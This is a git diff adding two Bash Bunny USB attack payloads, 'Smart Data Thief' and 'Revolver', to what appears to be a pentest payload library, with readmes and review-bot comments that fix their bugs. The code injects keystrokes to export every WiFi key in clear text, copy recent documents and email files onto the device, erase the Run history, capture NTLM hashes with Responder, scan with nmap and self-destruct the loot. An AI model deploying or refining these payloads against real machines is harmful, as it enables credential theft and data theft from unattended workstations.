diff --git a/payloads/library/exfiltration/SmartDataThief_Exfiltrator/payload.txt b/payloads/library/exfiltration/SmartDataThief_Exfiltrator/payload.txt new file mode 100644 index 00000000..d9824648 --- /dev/null +++ b/payloads/library/exfiltration/SmartDataThief_Exfiltrator/payload.txt 
@@ -0,0 +1,109 @@ +# Title: Smart Data Thief +# Description: Exfiltrates high value files from documents / desktop, gets all WiFi keys, shuts down after configurable +# time, may be triggered to start and / or stop by BLE, offers optional distraction on shutdown +# Author: saintcrossbow +# Props: Hak5Darren +# Version: 1.0 +# Category: Exfiltration +# Target: Windows 10 with minimum powershell usage +# Attackmodes: HID, Storage + +# Full Description +# ---------------- +# The perfect versatile data thief with multiple configurations to tailor attacks towards an engagement. Attack is timed +# so you'll know exactly how much time you have with each target. See the configuraton section for modifications. +# +# Payload targets the following from the workstation: +# - All WiFi creds +# - The past 30 days in both Desktop and Documents +# - All Word docs, Excel spreadsheets, loose email files (*.msg), text files, and OneNote notebooks +# +# * Note: All bluetooth monitoring based on Hak5Darren's methods already present on the Bash Bunny + +# Files +# ----- +# - payload.txt: Starts and monitors the attack. All configuration contained in this file. +# - verify.bat: Run the file exfiltration. You may configure the target files in this batch file. 
Of course, it really doesn't +# verify anything – it is just called that because it is "in disguise" + +# Setup +# ----- +# - Place the payload.txt and verify.bat on either switch directory +# - If you are using a SD card, copy verify.bat under /payloads/switchn/ (where n is the switch you are running) +# - Good idea to have the Bash Bunny ready to copy to either the device or SD for maximum versatility + +# LEDs +# ---- +# Magenta: Initial setup – about 1 – 3 seconds +# Slow 1 second yellow on and off: Waiting for start mission trigger by BLE +# Single yellow blink: Attack in progress +# Green rapid flash, then solid, then off: Attack complete – Bash Bunny may be removed + +# Options +# ------- +# Name of Bash Bunny volume that appears to Windows (BashBunny is default) +BB_NAME="BashBunny" +# Total time allocated for the attack, after which the Bash Bunny will shutdown +EJECT_TIME=30 +# BLE ID to stop attack immediately and go to shutdown +ABORT_MISSION="QSTOP" +# Flash a bunch of windows and lock PC if ABORT mission received +DISTRACT_ON_ABORT=false +# Do we wait for a start trigger? And what is it? 
+WAIT_FOR_TRIGGER=false +START_MISSION="QSTART" + +# Setup +# ----- +LED SETUP + +# Start bluetooth for observation +source bunny_helpers.sh +stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost +stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost +sleep 1 +echo -n -e "AT+ROLE=2" > /dev/ttyS1 +echo -n -e "AT+RESET" > /dev/ttyS1 + +# Wait for "button job" if desired +if $WAIT_FOR_TRIGGER; then + CUCUMBER ENABLE + LED Y SLOW + WAIT_FOR_PRESENT $START_MISSION +fi + +# Attack +# ------ +CUCUMBER DISABLE +ATTACKMODE HID STORAGE +Q DELAY 1000 +LED ATTACK +Q DELAY 100 +Q GUI r +Q DELAY 100 + +Q STRING cmd.exe /c start /min powershell ".((gwmi win32_volume -f 'label=''$BB_NAME''').Name+'payloads\\$SWITCH_POSITION\verify.bat')" +Q ENTER + +# Variation on the WAIT_FOR_PRESENT method so we can delay as well as observe BLE +for (( c=1; c<=$EJECT_TIME; c++ )) +do + timeout 1s cat /dev/ttyS1 > /tmp/bt_observation + if grep -ao $ABORT_MISSION /tmp/bt_observation; then + if $DISTRACT_ON_ABORT; then + for i in {1..5} + do + Q GUI d + Q DELAY 200 + done + Q GUI l + fi + break + fi +done + +sync +LED FINISH +Q DELAY 1500 +shutdown now + diff --git a/payloads/library/exfiltration/SmartDataThief_Exfiltrator/readme.md b/payloads/library/exfiltration/SmartDataThief_Exfiltrator/readme.md new file mode 100644 index 00000000..915a83f4 --- /dev/null +++ b/payloads/library/exfiltration/SmartDataThief_Exfiltrator/readme.md 
@@ -0,0 +1,54 @@ +## Smart Data Thief + +Make your Bash Bunny into the perfect data thief. This payload is ideal for demonstrating the need to lock workstations: using it, you can stroll through a facility and steal critical information from PC after PC. The attack is highly configurable with the following options: + + - Copies are timed to be as fast or as long as you want. You’ll know + exactly how long you have per workstation, and also know you can + remove the Bash Bunny safely once it the time expires + - The copy may be configured to stop when a secret BLE beacon is sent – + the Bash Bunny will shut down for immediate removal. + - Concerned that someone might see the attack? Configure the payload to + flash windows and suddenly lock before shutting down the Bash Bunny, + which gives the payload time to clean up its tracks while you make + appropriate excuses. + - Want to trigger the payload from afar? Make the attack a “button job” + – the Bash Bunny will take advantage of Cool Cucumber CPU usage while + waiting for the secret BLE beacon. + +The payload may be used with or without a SD card and places loot in a folder with the computer’s name. Additionally it targets the most likely high-value targets on a workstation, and only those that have been updated in past 30 days – however feel free to tailor parameters to your unique pentest situation. + +**Targets** + + 1. All WiFi creds used by the workstation + 2. The past 30 days in both Desktop and Documents for: +- Word docs +- Excel spreadsheets +- Loose email files (*.msg) +- Text files +- OneNote notebooks + +**Files Used** + +- payload.txt: Starts and monitors the attack. All configuration constants are contained in this file. +- verify.bat: Runs the file exfiltration. You may configure the target files in this batch file. Of course, it really doesn't verify anything – it is just called that because it is "in disguise" + +**Setup** +1. Place the payload.txt and verify.bat on either switch directory +2. 
If you are using a SD card, copy verify.bat to /payloads/switch*n*/ (where *n* is the switch you are running) +3. For maximum versatility, place verify.bat in both locations + +**Payload Configuration** + +Change any of the constants below to match your mission parameters: +- BB_NAME: Make sure you have the right Bash Bunny name in this constant +- EJECT_TIME: Total time allocated for the attack, after which the Bash Bunny will shutdown +- ABORT_MISSION: Specify what BLE beacon will stop the attack - the payload will check every second for the beacon +- DISTRACT_ON_ABORT: If the payload is stopped by the BLE beacon, it will also flash a bunch of windows and lock the PC before shutting down to cause a distraction. +- WAIT_FOR_TRIGGER: Don’t start the attack immediately but wait for the BLE beacon. +- START_MISSION: The BLE beacon that will remotely start the attack. Make sure WAIT_FOR_TRIGGER is set to true. + +**LED meanings** +- Magenta: Initial setup – about 1 – 3 seconds +- Slow 1 second yellow on and off: Waiting for start mission trigger to be sent by BLE +- Single yellow blink: Attack in progress +- Green rapid flash, then solid, then off: Attack complete – Bash Bunny may be removed \ No newline at end of file diff --git a/payloads/library/exfiltration/SmartDataThief_Exfiltrator/verify.bat b/payloads/library/exfiltration/SmartDataThief_Exfiltrator/verify.bat new file mode 100644 index 00000000..a6c9c496 --- /dev/null +++ b/payloads/library/exfiltration/SmartDataThief_Exfiltrator/verify.bat 
@@ -0,0 +1,14 @@ +@echo off +cd /d %~dp0 +mkdir \loot\WiFiCreds\%COMPUTERNAME% +cd \loot\WiFiCreds\%COMPUTERNAME% +netsh wlan export profile key=clear +timeout 1 +mkdir \loot\DriveLast30\%COMPUTERNAME% +cd \loot\DriveLast30\%COMPUTERNAME% +robocopy %userprofile%\Documents\ . *.doc* *.xls* *.msg *.txt *.one /S /J /MT /MAXAGE:30 /MAX:4000000 /R:0 /np /nfl +robocopy %userprofile%\Desktop\ . *.doc* *.xls* *.msg *.txt *.one /S /J /MT /MAXAGE:30 /MAX:4000000 /R:0 /np /nfl + +REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f +timeout 1 +exit \ No newline at end of file diff --git a/payloads/library/general/Revolver_BLE-Controlled-Attacks/payload.txt b/payloads/library/general/Revolver_BLE-Controlled-Attacks/payload.txt new file mode 100644 index 00000000..93770036 --- /dev/null +++ b/payloads/library/general/Revolver_BLE-Controlled-Attacks/payload.txt 
@@ -0,0 +1,261 @@ +# Title: Revolver +# Description: Multiple network attacks and modes based on BLE beacons +# Author: saintcrossbow +# Props: Hak5Darren (BLE, QuickCreds, nmap) +# Version: 1.0 +# Category: General +# Target: Windows 10 with minimum powershell usage +# Attackmodes: All + +# Full Description +# ---------------- +# This payload was made in the style of Q Branch: those that use this need to know they have +# multiple options for attack as well as getting out of a bad situation. Switching into this +# payload will place the Bash Bunny in a command waiting mode. BLE beacons are sent to start +# attacks, including QuickCreds and nmap. A loot self-destruct option is also available. The +# payload is easily extendable to include any attack you might need in the field. +# +# Note other payloads were co-opted into this multimode attack, and to make it easy I used +# Hak5Darren's code, partially because I imagine he wants to see these payloads extended, +# and also because I know he appreciates Q Branch. + +# Configuring +# ----------- +# Change the BLE beacon commands listed in Options below to something unique to you. Definitely +# do not want someone else activating your Bash Bunny. Also verify the responder and nmap +# options are to your liking. + +# Usage +# ----- +# Plug in to get into command waiting mode (slow white LED). Launch attacks by sending the +# right BLE beacon. Make sure to stop the beacon after the attack so you won't go into a loop. + +# LEDs +# ---- +# Slow white LED: Awaiting BLE commands +# Yellow: Attack in progress +# Red: Self destruct of loot +# Blue solid: USB mode +# Cyan solid: Ethernet mode + +# Options +# ------- +REQUIRETOOL responder + +# BLE beacon options - change to your preferences. 
Make sure to use things +# you'll not encounter since you don't want to start a self-destruct sequence +# on accident +ABORT_MISSION="QSTOP" +START_QUICKCREDS_WIN="QCREDS" +START_QUICKCREDS_NIX="QCREDNIX" +START_NMAP="QNMAP" +START_USB="QLOOT" +START_ETHER="QETHER" +START_DEL_LOOT="QSELFD" + +# Responder options +RESPONDER_OPTIONS="-w -r -d P" +RESPONDER_LOOTDIR=/root/udisk/loot/quickcreds +# Nmap options +NMAP_OPTIONS = "-sS -O -sV -F -oA" +NMAP_LOOTDIR=/root/udisk/loot/nmap + +# Setup +# ----- +LED SETUP + + +# Responder +# --------- +# Note: This is a modified version of quick creds +# Original by Hak5Darren +# --------- +startResponder() +{ + CUCUMBER DISABLE + # Set convenience variables + GET TARGET_HOSTNAME + GET TARGET_IP + + # Setup named logs in loot directory + mkdir -p $RESPONDER_LOOTDIR + HOST=${TARGET_HOSTNAME} + # If hostname is blank set it to "noname" + [[ -z "$HOST" ]] && HOST="noname" + COUNT=$(ls -lad $RESPONDER_LOOTDIR/$HOST* | wc -l) + COUNT=$((COUNT+1)) + mkdir -p $RESPONDER_LOOTDIR/$HOST-$COUNT + + # As a backup also copy logs to a loot directory in /root/loot/ + mkdir -p /root/loot/quickcreds/$HOST-$COUNT + + # Check target IP address. If unset, blink RED and end. 
+ if [ -z "${TARGET_IP}" ]; then + LED FAIL2 + exit 1 + fi + + # Set LED yellow, run attack + LED ATTACK + cd /tools/responder + + # Clean logs directory + rm logs/* + + # Run Responder with specified options + python Responder.py -I usb0 $RESPONDER_OPTIONS & + + # Wait until NTLM log is found + until [ -f logs/*NTLM* ] + do + # Ima just loop here until NTLM logs are found + sleep 1 + done + + # copy logs to loot directory + cp logs/* /root/loot/quickcreds/$HOST-$COUNT + cp logs/* $RESPONDER_LOOTDIR/$HOST-$COUNT + + # Sync USB disk filesystem + sync + LED FINISH + Q DELAY 1500 + + # Return to waiting mode + CUCUMBER ENABLE + LED W SLOW +} + +# Nmap +# ---- +# Note: This is a modified version of one of the very first payloads, nmap +# Original by Hak5Darren +# ---- +startNmap() +{ + CUCUMBER DISABLE + ATTACKMODE RNDIS_ETHERNET + + GET TARGET_HOSTNAME + GET TARGET_IP + + # Setup named logs in loot directory + mkdir -p $NMAP_LOOTDIR + HOST=${TARGET_HOSTNAME} + # If hostname is blank set it to "noname" + [[ -z "$HOST" ]] && HOST="noname" + COUNT=$(ls -lad $NMAP_LOOTDIR/$HOST*.log | wc -l) + COUNT=$((COUNT+1)) + + if [ -z ""${TARGET_IP} ]; then + LED FAIL + Q DELAY 1500 + else + LED ATTACK + nmap $NMAP_OPTIONS $TARGET_IP >> $NMAP_LOOTDIR/$HOST-$COUNT.log + sync + LED FINISH + Q DELAY 1500 + fi + + # Return to waiting mode + CUCUMBER ENABLE + LED W SLOW +} + +startLoot() +{ + CUCUMBER DISABLE + # We are going for solid LED this time in case the device needs to be played off as normal USB + # ... and best of luck to you on that! + LED B SOLID + ATTACKMODE STORAGE +} + +# For sharing, getting on via putty, or exiting USB mode +startEthernet() +{ + CUCUMBER DISABLE + LED C SOLID + ATTACKMODE RNDIS_ETHERNET +} + + +# Delete everything in loot directory +# Depending on your engagement, could also delete switch and library - but be careful! +# Switches to HID to ensure it is not in USB mode or possibly timing out in Ethernet. 
Going plaid +# to delete those files +startSelfDestruct() +{ + ATTACKMODE HID + CUCUMBER PLAID + LED R SOLID + rm -r /root/udisk/loot + rm -r /root/loot/ + sync + shutdown now +} + +# Main +# ---- +# Start bluetooth for observation +source bunny_helpers.sh +stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost +stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost +sleep 1 +echo -n -e "AT+ROLE=2" > /dev/ttyS1 +echo -n -e "AT+RESET" > /dev/ttyS1 + +# Wait for BLE +CUCUMBER ENABLE +LED W SLOW + +while : +do + timeout 1s cat /dev/ttyS1 > /tmp/bt_observation + + # Shutdown + if grep -ao $ABORT_MISSION /tmp/bt_observation; then + sync + LED FINISH + Q DELAY 1500 + shutdown now + fi + + # Responder - Windows + if grep -ao $START_QUICKCREDS_WIN /tmp/bt_observation; then + ATTACKMODE RNDIS_ETHERNET + startResponder + fi + + # Responder - *nix or mac + if grep -ao $START_QUICKCREDS_NIX /tmp/bt_observation; then + ATTACKMODE ECM_ETHERNET + startResponder + fi + + # Start nmap against host + if grep -ao $START_NMAP /tmp/bt_observation; then + startNmap + fi + + # Open as USB device + if grep -ao $START_USB /tmp/bt_observation; then + startLoot + fi + + # Open as Ethernet device + if grep -ao $START_ETHER /tmp/bt_observation; then + startEthernet + fi + + # Limited self-destruct of loot + if grep -ao $START_DEL_LOOT /tmp/bt_observation; then + startSelfDestruct + # Leave the scene after the delete + break + fi + +done + +sync diff --git a/payloads/library/general/Revolver_BLE-Controlled-Attacks/readme.md b/payloads/library/general/Revolver_BLE-Controlled-Attacks/readme.md new file mode 100644 index 00000000..31846015 --- /dev/null +++ b/payloads/library/general/Revolver_BLE-Controlled-Attacks/readme.md 
@@ -0,0 +1,25 @@ +## Revolver + + +This payload was made in the style of Q Branch: it provides multiple options for attack and getting out of bad situations. Switching into this payload will place the Bash Bunny in a command waiting mode. BLE beacons are sent to start attacks, including QuickCreds and nmap. A loot self-destruct option is also available. The payload is easily extendable to include any attack you might need in the field. + +Note other payloads were co-opted into this multimode attack, and to make it easy +I used Hak5Darren's code, partially because I imagine he wants to see these payloads +extended, and also because I know he appreciates Q Branch. + +**Features** + - Once active, the Bash Bunny blinks a white LED indicating it is waiting for BLE beacons + - Commands may be issued to start classic payloads (nmap, quickcreds), switch modes (USB storage or Ethernet), shutdown for removal, or initiate a loot self-destruct + - After attacks are complete, Bash Bunny returns to a waiting state for more commands (except for self destruct and shut down) + +**Payload Configuration** +1. Change the BLE beacons in the *Options* section. Don't leave in defaults - you don't want someone else to control your Bash Bunny! +2. Verify the responder and nmap options are to your liking + +**LED meanings** +- Slow 1 second white on and off: Awaiting commands +- Single yellow blink: Attack in progress +- Green rapid flash, then solid: Attack complete +- Solid red: Loot self-destruct - complete and ready to remove when off +- Solid blue: USB mode +- Solid cyan: Ethernet mode
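Review bot: In the Setup block of SmartDataThief_Exfiltrator/payload.txt the `stty -F /dev/ttyS1 speed 115200 ...` line appears twice verbatim; the second copy can be dropped. Two smaller points in the same file: the abort loop's `grep -ao $ABORT_MISSION /tmp/bt_observation` prints any match to stdout, where `grep -aq` is the idiom for a test; and the header comment should state that `EJECT_TIME` is a hard cutoff, because `shutdown now` fires when the loop ends whether or not `verify.bat` has finished writing, so a slow copy leaves partial loot.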
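Review bot: The Targets list in SmartDataThief_Exfiltrator/readme.md nests its sub-items incorrectly: the `- Word docs` through `- OneNote notebooks` bullets sit at column 0 under `2. The past 30 days in both Desktop and Documents for:`, so they render as a separate top-level list rather than as children of item 2; indent them. Also fix `once it the time expires` to `once the time expires` and `updated in past 30 days` to `updated in the past 30 days`, and mention the per-file size cap that verify.bat applies (`/MAX:4000000`), since the Targets list as written implies every matching file is copied.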
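Review bot: In verify.bat the `cd /d %~dp0` line is the only thing that makes the later `mkdir \loot\WiFiCreds\%COMPUTERNAME%` resolve to the root of the Bash Bunny volume rather than the system drive; that deserves a comment. The two `cd \loot\...` lines should also fail closed (e.g. `cd \loot\WiFiCreds\%COMPUTERNAME% || exit`), because if the volume is read-only or the mkdir fails, `netsh wlan export profile key=clear` and the robocopy runs write into whatever the current directory happens to be.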
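Review bot: In Revolver_BLE-Controlled-Attacks/payload.txt, `startResponder` terminates the whole payload with `exit 1` when `TARGET_IP` is unset, so the Bash Bunny never returns to command-waiting mode; this contradicts the readme's "returns to a waiting state" and the `LED FAIL` fall-through in `startNmap`. Use `return 1` after `LED FAIL2`, restore `CUCUMBER ENABLE` / `LED W SLOW`, and move the check ahead of the `mkdir -p` calls so no empty loot directories are created. Two syntax points in the same hunk: `NMAP_OPTIONS = "-sS -O -sV -F -oA"` has spaces around `=`, which bash parses as a command named `NMAP_OPTIONS` rather than an assignment, leaving the variable empty at runtime (and `-oA` expects a basename argument, which the existing redirect to `$NMAP_LOOTDIR/$HOST-$COUNT.log` makes redundant); and `[ -z ""${TARGET_IP} ]` should be `[ -z "${TARGET_IP}" ]` as in `startResponder`. The `break` after `startSelfDestruct` is unreachable, since that function ends with `shutdown now`.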
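Review bot: The LED meanings list in Revolver_BLE-Controlled-Attacks/readme.md omits the failure states the payload emits: `startResponder` calls `LED FAIL2` and `startNmap` calls `LED FAIL` when `TARGET_IP` is unset, both of which blink red, while the readme documents only solid red as loot self-destruct. Add a line for the red blink so an operator does not mistake a missing-IP failure for a self-destruct, and note under Features that after `QLOOT` or `QETHER` the device stays in that mode with a solid LED while the main loop continues to listen for further beacons.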